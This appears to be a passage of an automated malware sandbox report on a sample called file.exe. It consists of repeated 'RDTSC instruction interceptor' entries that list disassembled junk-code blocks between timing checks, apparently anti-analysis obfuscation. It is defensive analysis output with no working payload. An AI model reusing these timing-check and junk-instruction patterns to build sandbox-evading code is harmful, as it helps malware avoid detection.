Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F27F4 second address: 6F281C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FF8A95A6CB6h 0x00000009 jno 00007FF8A95A6CB6h 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FF8A95A6CBAh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F281C second address: 6F2822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4F5C second address: 6F4F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4F61 second address: 6F4F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A909BC1Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4F72 second address: 6F4F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CBFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A7A6 second address: 66A7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FF8A909BC29h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4B0B second address: 6F4B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4B13 second address: 6F4B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4B18 second address: 6F4B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4B1E second address: 6F4B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF8A909BC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB61E second address: 6FB627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB627 second address: 6FB655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC23h 0x00000009 jmp 00007FF8A909BC25h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB655 second address: 6FB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB660 second address: 6FB671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF8A909BC16h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB671 second address: 6FB675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB675 second address: 6FB67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB67B second address: 6FB694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8A95A6CC4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB694 second address: 6FB69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB69D second address: 6FB6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA0EA second address: 6FA0EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA0EE second address: 6FA0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6F5E second address: 6A6FC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF8A909BC27h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FF8A909BC28h 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FF8A909BC18h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D28BDh], eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6FC7 second address: 6A6FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA789 second address: 6FA78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA78F second address: 6FA798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA798 second address: 6FA7A8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF8A909BC16h 0x00000008 jnl 00007FF8A909BC16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA7A8 second address: 6FA7CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jnc 00007FF8A95A6CB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB37B second address: 6FB380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB380 second address: 6FB392 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF8A95A6CB8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF74C second address: 6FF755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF755 second address: 6FF759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FEDFA second address: 6FEE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FEE10 second address: 6FEE2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF109 second address: 6FF114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF8A909BC16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF114 second address: 6FF11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF2B5 second address: 6FF2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FF8A909BC1Eh 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF2C9 second address: 6FF2E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007FF8A95A6CB6h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FF8A95A6CBCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 702EF0 second address: 702F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A909BC20h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7032EA second address: 703309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A95A6CC5h 0x00000009 jne 00007FF8A95A6CB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703309 second address: 70332F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8A909BC22h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 709774 second address: 70977A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70977A second address: 70977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70977E second address: 7097A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FF8A95A6CB6h 0x00000010 ja 00007FF8A95A6CB6h 0x00000016 jo 00007FF8A95A6CB6h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7097A9 second address: 7097B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FF8A909BC16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 709919 second address: 709920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 709920 second address: 70992C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007FF8A909BC16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 709DEF second address: 709DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 709DF5 second address: 709DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709DFB second address: 709E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB48 second address: 70AB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB4C second address: 70AB55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB55 second address: 70AB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Dh 0x00000009 jmp 00007FF8A909BC28h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AB7F second address: 70AB8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B10C second address: 70B13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8A909BC26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B13A second address: 70B13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B13E second address: 70B15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF8A909BC16h 0x0000000e jmp 00007FF8A909BC21h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713C27 second address: 713C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713C2B second address: 713C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712DEE second address: 712DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7130AF second address: 7130BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7130BB second address: 7130D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jl 00007FF8A95A6CCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FF8A95A6CB6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71337C second address: 713380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713380 second address: 713384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713384 second address: 71339E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A909BC20h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71339E second address: 7133A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713920 second address: 71394C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A909BC1Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF8A909BC26h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B319 second address: 71B343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FF8A95A6CBCh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8A95A6CBCh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007FF8A95A6CB6h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B343 second address: 71B349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B4BC second address: 71B4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B8F6 second address: 71B8FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71BD74 second address: 71BD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CFA8 second address: 71CFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A909BC26h 0x00000009 jmp 00007FF8A909BC1Ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AEC2 second address: 71AECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF8A95A6CB6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AECE second address: 71AED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722AA9 second address: 722AB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A95A6CB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722AB5 second address: 722ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722ABB second address: 722ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7244AA second address: 7244BE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jg 00007FF8A909BC16h 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7244BE second address: 7244C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73699A second address: 73699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73699F second address: 7369A9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF8A95A6CCDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736417 second address: 736421 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736421 second address: 736427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E36 second address: 739E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E40 second address: 739E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E44 second address: 739E54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E54 second address: 739E68 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007FF8A95A6CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FF8A95A6CB6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E68 second address: 739E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF8A909BC1Eh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 ja 00007FF8A909BC16h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E82 second address: 739E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EA99 second address: 73EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EA9D second address: 73EAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EAA3 second address: 73EAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EAA9 second address: 73EAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EAAD second address: 73EAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66208C second address: 662090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662090 second address: 66209A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66209A second address: 6620AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6620AB second address: 6620AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6620AF second address: 6620B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E02A second address: 74E037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007FF8A909BC18h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E612 second address: 74E629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FF8A95A6CBEh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E629 second address: 74E633 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
